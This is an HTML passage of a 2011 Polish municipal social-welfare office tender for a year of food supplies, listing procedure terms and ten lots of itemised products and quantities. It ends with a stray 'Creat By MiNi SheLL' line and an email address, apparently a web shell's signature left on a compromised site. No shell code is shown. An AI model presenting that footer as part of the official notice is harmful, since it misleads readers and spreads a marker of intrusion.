<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy można dokonać w niżej wymienionych przypadkach:
1) zmiana danych teleadresowych,
2) zmiana wynagrodzenia spowodowana usługami dodatkowymi lub zamiennymi,
3) utrudnieniami, opóźnieniami lub przeszkodami spowodowanymi przez Zamawiającego,
4)występowaniem okoliczności, których strony nie mogły przewidzieć, pomimo zachowanie należytej staranności .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://nidzica-mops.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Nidzicy
ul. Kolejowa 5, pok. 13
SIWZ wydawany nieodpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2011 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Nidzicy
13-100 Nidzica, ul. Kolejowa 5
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1	Schab bez kości, surowy 	kg	80
2	Kotlet hamburger	kg	50
3	Karkówka wieprzowa b/k, surowa 	kg	100
4	Pasztetowa
-w naturalnym flaku 	kg	120
5	Łopatka bez kości, surowa	kg	360
6	Żeberka surowe
Chude bez boczku 	kg	100
7	Boczek wędzony parzony zawartość mięsa min. 55-60%	kg	150
8	Baleron	kg	50
9	
Szynka surowa, bez kości	kg	140
10	Kiełbasa zwyczajna 
mięso wieprzowe (35-40%), mięso wołowe (25-30%), woda, kolagen, skrobia ziemniaczana, białko sojowe, sól, cukry, przeciwutleniacze: E300, E316, E301, stabilizator E451, aromaty i ekstrakty przypraw naturalnych, wzmacniacz smaku E621, konserwant E240, zawiera gluten 
	kg	400
11	Kiełbasa francuska 	kg	400
12	kiełbaski śląskie 	kg	400
13	Kiełbasa ogniskowa 	kg	400
14	Parówki wieprzowe w folii
 - mięso wieprzowe (65-70%), tłuszcz wieprzowy, tkanka łączna wieprzowa, skrobia ziemniaczana, sól, białko sojowe, błonnik pszenny, glukoza, przyprawy
 	kg	220
15	Kiełbasa biała	kg	200
16	Szynka wędzona	kg	50
17	Ogonówka	kg	50
18	Serdelki w osłonce 
-zawartość mięsa 65-70%	kg	180
19	Smalec(200g)	Szt.	600
20	Salceson
-w naturalnym flaku	Kg	110
21	Kaszanka jęczmienna 
kasza jęczmienna, krew, głowizna, sól, pieprz, podgardle, skórki, sadło, cebula	Kg	200
21	Kaszanka gryczana 
-  kasza gryczana, krew, głowizna, skórki, sadło, podgardle, wątroba wieprzowa, cebula, sól, pieprz	Kg 	150
23	Wątróbka wieprzowa, surowa 	kg	80
24	Wędlina
-mielonka 	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
2	Żołądki indycze 	kg	25
3	Udka z kurczaka	kg	500
4	Porcje rosołowe z kurczaka 
-ze skrzydełkami 	kg	850.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1.		Cukier w oryginalnych opakowaniach 1kg
-biały	 Kg	250
2.		Cukier puder w opakowaniach 0,5kg
-biały mielony	Kg	6 
3.		Cukier waniliowy w opakowaniach 32 g	Szt.	60
4.		Kasza jęczmienna w oryginalnych opakowaniach 5kg
-drobna	Kg	140
			
5.		Kasza gryczana w oryginalnych opakowaniach 5 kg
-prażona	Kg	50
6.		Ryż biały długoziarnisty  w oryginalny opakowaniach 1 kg	Kg	190
7.		Mąka luksusowa w oryginalnych opakowaniach 1kg
-pszenna	Kg	400
8.		Mąka tortowa w oryginalnych opakowaniach 1 kg 
-pszenna	Kg 	100
9.		Mąka ziemniaczana w oryginalnych opakowaniach 1 kg 	Kg 	50
10.		Makaron nitki, kolanka,  łazanki, świderki, gwiazdki, spaghetti w oryginalnych opakowaniach 3 kg 	Kg	300
			
11.		Sól  kuchenna jodowana, biała drobna w oryginalnych opakowaniach 1kg	Kg	270
12.		Dżem niskosłodzony- różne smaki (300g)
-zawartość cukru 35-40 g na 100g produktu 
 -35-40 g owoców na 100 g prpduktu	Szt.	140
13.		Majeranek w oryginalnych opakowaniach  10g	Szt.	100
14.		Liść laurowy w oryginalnych opakowaniach 7 g	Szt.	100
15.		Pieprz ziołowy w oryginalnych opakowaniach  20g	Szt.	250
16.		Koperek suszony w oryginalnych opakowaniach  20g	Szt.	100
17.		Przyprawa do kurczaka w oryginalnych opakowaniach 20g	Szt.	50
18.		Pietruszka suszona w oryginalnych opakowaniach 10g	Szt.	100
19.		Papryka sypka w oryginalnych opakowaniach 20g	Szt.	100
20.		Ziele angielskie w oryginalnych opakowaniach 15g	Szt.	100
21.		Pieprz naturalny mielony w oryginalnych opakowaniach 20g	Szt.	250
22.		Przyprawa w  płynie  do zup, mięs, tatara, innych potraw 900 ml
-skład: woda, sól, substancja wzmacniające smak i zapach 	Szt.	40
23.		Wafel w polewie czekoladowej - kruchy wafelek z  kremem kakaowy od 48 do 50 %, czekolada 30-35 %            39g	Szt.	900
24.		Baton  czekoladowy z  nadzieniami: orzechowym, toffi, śmietankowym, waniliowym. Czekolada mleczna 50-60% 	Szt.	900
25.		Herbatniki  80 g	Szt.	900
26.		Biszkopty  w polewie czekoladowej z galaretką (147g)
-zawartość czekolady 10-15%
	Szt.	1000
27.		Konserwa turystyczna w oryginalnych opakowaniach (130g)	Szt.	900
28.		Gulasz angielski oryginalnych opakowaniach (130g)	Szt.	900
29.		Paprykarz  szczeciński oryginalnych opakowaniach (130g)	Szt.	900
30.		Tuńczyk w sosie własnym, konserwa 130g	Szt.	500
31.		Ryba w sosie pomidorowym, konserwa 130g	Szt.	500
32.		Mielonka, konserwa 130g	Szt.	50
33.		Oliwa z oliwek 1000ml
-otrzymana bezpośrednio z oliwek	Szt	10
34.		Ocet 10% 0,5l	Szt.	90
35.		Kwasek cytrynowy 20g	Szt.	70
36.		bułka tarta0,5kg	Szt.	160
37.		Koncentrat pomidorowy 900g)
-30%	Szt.	230
38.		Przyprawa warzywna w  proszku do potraw 1 kg ( 15-20% suszone warzywa - marchew, pasternak, cebula, seler, natka pietruszki. , np. Kucharek lub równoważne 	Szt.	90
39.		Olej 1L 
-100%	Szt.	150
40.		Herbata
-min 100 szt. w opakowaniu 	Szt.	15
41.		Ketchup pomidorowy w słoiku 815 g
-koncentrat pomidorowy 60-65 %	Szt.	30
42.		Napój w  proszku (koncentrat)1 kg - różne smaki	Szt.	150
43.		Sok marchwiowo bananowy zagęszczany  0,30l
-przeciery i soki 55-60%, z różnego rodzaju owoców i warzyw	Szt.	3000
44.		Sok Jabłkowy 1l
-bez dodatku cukru	Szt.	150
45.		Sok pomarańczowy 1l
-bez dodatku cukru	Szt.	       150
46.		Sok wieloowocowy 1l
Bez dodatku cukru	Szt.	150
47.		Soczek ze słomką 003l	Szt.	600
48.		Draże czekoladowe 70g	Szt.	150
49.		Kukurydza konserwowa 400g
-zawartość netto 400g
-po odlaniu zalewy 220 g	Szt.	100
50.		Pasztet  z kurcząt w  puszcze  130 g	Szt.	1000
51.		Majonez sałatkowy 850g słoik
-Olej roślinny rafinowany, musztarda (woda, ocet, gorczyca, cukier, sól, zioła), woda, żółtka jaj kurzych (7-8%)
-bez konserwantów	Szt.	25
52.		Musztarda300g )
-woda, gorczyca, ocet jabłkowy, cukier, sól, przyprawy, barwnik: kurkumina
	Szt.	20
53.		Ogórki konserwowe słoik 0,9
-ogórki, woda, ocet, cukier, sól, przyprawy (zawierają gorczycę)
	Szt.	200
54.		Sos grzybowy w proszku w  pudełku  1-1kg 
-bez konserwantów	Kg	20
55.		Sos pomidorowy 2000g pakowany  w  puszcze
-pomidory 75-80%
-koncentrat 18-20%
-olej rośliny, sól, cukier, cebula, suszona, kwasek cytrynowy 	Szt.	100
56.		Proszek do pieczenia 25g	Szt.	20
57.		Cukierki czekoladowe (mieszanki firmowe)	Kg 	50
58.		Czekolada pełnomleczna 100 g
-czekolada mleczna 50-55% (cukier, tłuszcz kakaowy, miazga kakaowa, mleko pełne w proszku, serwatka w proszku, tłuszcz mleczny) 
	Szt.	700
59.		Czekolada z nadzieniem owocowym 100g
-czekolada mleczna (cukier, tłuszcz kakaowy, miazga kakaowa, mleko pełne w proszku, tłuszcz mleczny, emulgatory: lecytyna sojowa, E476, aromat
-nadzienie owocowe-różne smaki 		700
60.		Lizak	Szt.	300
61.		Sok zagęszczony do rozcieńczania kompotu- różne smaki 500 ml 	Szt. 	160
62.		Szczaw słoik 350 g
-siekany	Szt.	350
63.		Zupka chińska z makaronem ( różne smaki) 50 g
	Szt.	500
64.		Zupa borowikowa w proszku 3kg
Wartość na 100g 
Energia kJ 1395-1400
Energia kcal 333-335 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 55-60 g 
	Szt.	20
65.		Zupa kalafiorowa w proszku 3 kg 
Wartość na 100g 
Energia kJ 1612-1615
Energia kcal 380-385 kcal
Tłuszcz 12-13 g
Białko 8-10 g
Węglowodany 60-62 g 
	Szt.	30
66.		Zup pieczarkowa w proszku 3 kg
Wartość na 100g 
Energia kJ 1485-1450
Energia kcal 350 -355 kcal
Tłuszcz 10-12 g
Białko 8-10 g
Węglowodany 45-50g 
	Szt.	30
67.		Barszcz czerwony- zupa w proszku 3kg
Wartość na 100g 
Energia kJ 1410-1415
Energia kcal 333 -336 kcal
Tłuszcz 8-10 g
Białko 3-5 g
Węglowodany 50-55g 

	Szt.	35
68.		Barszcz biały - zupa w proszku 3 kg
Wartość na 100g 
Energia kJ 1394-1400
Energia kcal 330 -335 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 50-55g 
	Szt.	50
69.		Żurek- zupa w proszku 3 kg
Energia kJ 1270-1275
Energia kcal 300-305 kcal
Tłuszcz 7-10 g
Białko 10-12 g
Węglowodany 48-50g 
	Szt.	20
70.		Żurek -koncentrat w płynie 500ml	Szt. 	50
71.		Zupa ogonowa w proszku 3 kg
Wartość na 100g 
Energia kJ 1300-1320
Energia kcal 314 -320 kcal
Tłuszcz 8-10 g
Białko 13-15 g
Węglowodany 35-40 g 
Wydajność ok. 25 l 	Szt.	15
72.		Zupa szparagowa w proszku 3 kg
Wartość na 100g 
Energia kJ 1512-1515
Energia kcal 355 -360 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 55-60 g 
	Szt. 	20
73.		Zupa brokułowa w proszku 3 kg
Wartość na 100g 
Energia kJ 1395-1400
Energia kcal 333-335 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 60-63 g 
	Szt..	15
74.		Groszek konserwowy 400 g
-zawartość netto 400g
-po odlaniu zalewy 220 g	Szt.	120
75.		Fasola w  opakowaniach 5 kg
-drobna 	kg	150
76.		Fasola Jaś w opakowaniach 5 kg 	kg	50
77.		Groch łuskany połówki w opakowaniach  5 kg	kg	200
78.		Chrzan w słoiczku 300 g	Szt.	10
79.		Kakao 	Szt.	10
80.		Krem czekoladowy z orzechami laskowymi do smarowania pieczywa. Nie zawiera substancji konserwujących  i barwników. 250g	Szt.	50
81.		Rosół z kury 3 kg
Energia kJ 985-990
Energia kcal 240 -250 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 31-33 g 
	Szt.	50
82.		Sos do spaghetti (bolognese, słodko kwaśny) w słoiku 800 g 		30
83.		Sos sałatkowy w proszku 9g
-różne smaki	Szt. 	50
84.		Barszcz czerwony- koncentrat w płynie 
-woda, zagęszczony sok z buraków ćwikłowych min 25 % , cukier, sól, ocet, kwas cytrynowy, regulator kwasowości, kwas askrobionowy, przeciwutleniacz 	Szt. 	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ryby mrożone, filety rybne i pozostałe mięso z ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1	Filet mrożony z pangi o zawartości glazury lodowej do 25%	kg	90
2	Filet z mintaja kostka o zawartości glazury lodowej do 25%	kg	60
3	Filet z miruny  o zawartości glazury lodowej do 25%	kg	50
4	Filety śledziowe małosolne	Kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1	Włoszczyzna  2.5 kg
-4 składnikowa	kg	800
2	Kalafior mrożony 2.5 kg	kg.	200
3	Brokuły             2.5 kg	kg	150
4	Zupa jarzynowa   2.5 kg
-7 składnikowa 
	kg	200
5	Marchew z groszkiem  2.5 kg	Kg	100
6	Marchew kostka 2,5 kg	Kg	100
7	Marchew juniorka 2,5  kg	kg	50
8	Fasola szparagowa 2,5 kg	Kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty głęboko mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jedn. miary	Max. Ilość
1	2	3	4
1	Frytki           2,5kg
-niekarbowane 	kg.	50
2	Kopytka  500g	Szt.	150
3	Pierogi z twarogiem  500g	Szt.	200
4	Pierogi ruskie 500g	szt	100
5	Pierogi z kapustą 500g	Szt.	150
6	Pierogi z miesem500g	Szt.	150
7	Pierogi z truskawkami 500g	Szt.	100
8	Pyzy z mięsem 500g	Szt.	280
9	Pyzy bez mięsa 500 g		100
10	Uszka  z mięsem oraz z  kapustą 500g	Szt.	 40
11	Pizza (z pieczarką lub szynką) mała	Szt.	125
12	Zapiekanka -mała	Szt.	125.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1.		Masło śmietankowe 200 g	Szt.	200
2.		Mleko 3,2 karton 1l	Szt.	400
3.		Śmietana 30% 0,5l karton 
	Szt.	1000
4.		Śmietana 12% kubek 200g	Szt.	300
5.		Jogurt owocowy z  kawałkami owoców ( 9% owoców)
150-g	Szt.	4000
6.		Jogurt owocowy bez kawałków owoców 150-g 	Szt.	2500
7.		Ser biały twarogowy półtusty	kg	100
8.		Ser twardy równoważnik gouda	kg	10
9.		Serek homogenizowany (waniliowy) 150 g	Szt.	2000
10.		Serek homogenizowany owocowy 140g 	Szt.	5500
11.		Serek homogenizowany czekoladowy 140g	Szt.	2000
12.		Deser z koroną - rózne smaki z bitą śmietaną 175g 	Szt.	1000
13.		Serek topiony  ( w prostokącie) (100 g)	Szt.	800
14.		Deser mleczny 
-z ryżem lub kaszą
-140 g	Szt.	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. 	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1.		Marchew 	kg	200
2.		Pietruszka 	kg	60
3.		Cebula 	kg	180
4.		Kapusta biała 	kg	300
5.		Kapusta młoda	Szt.	200
6.		Kapusta pekińska	Szt.	110
7.		Ogórki szklar 	kg	100
8.		Buraki	kg	400
9.		Pomidory szklar	kg	35
10.		Kalafior 	Szt.	100
11.		Papryka 	kg	25
12.		Pieczarki	kg	160
13.		Kapusta kiszona	kg	420
14.		Ogórki kwaszone	kg	220
15.		Truskawki świeże	kg	30
16.		Jabłka I gatunek 	kg	850
17.		Mandarynki	kg	150
18.		Cytryny	kg	8
19.		Seler 	kg	50
20.		Por 	Szt.	200
21.		Banan	kg	650
22.		Pomarańcza	kg	650
23.		Kiwi	Szt.	500
24.		Brzoskwinia	Kg 	100
25.		Nektarynka 	Kg 	100
26.		Morela 	kg	50
27.		Winogron 	kg	50
28.		Sałata zielona 	szt	60
29.		Jajko 	Szt.	5100
30.		Koper- pęczek	Szt.	60
31.		Czosnek 	Szt.	50
32.		Rzodkiewka	pęczek	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> pieczywo, świeże wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1	Chleb baltonowski  krojony mieszany (500 g)	Szt.	6300
2	Chleb krojony graham(500g)	Szt.	100
3	Chleb razowy (500g)	Szt.	100
4	Bułki poznańska (0,08g)
	Szt.	5000
5	Pączki z nadzieniem( 0.08g)	Szt.	1200
6	Bułka z nadzieniem owocowym (0,08g)
	Szt.	1500
7	Bułka z pieczarka (0,80g)	Szt.	1600
8	Bułka z parówką (0,80g)	Szt.	1600
9	Ciasto drożdżowe	Kg	40
10	Tort 	Kg	20
11	Babka- różne smaki	Kg 	10
12	Sernik	kg	15
13	Rolada- różne smaki	Kg 	15
14	Makowiec 	Kg 	15
15	Ciasto z owocami	Kg 	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki	kg	9000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.31.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com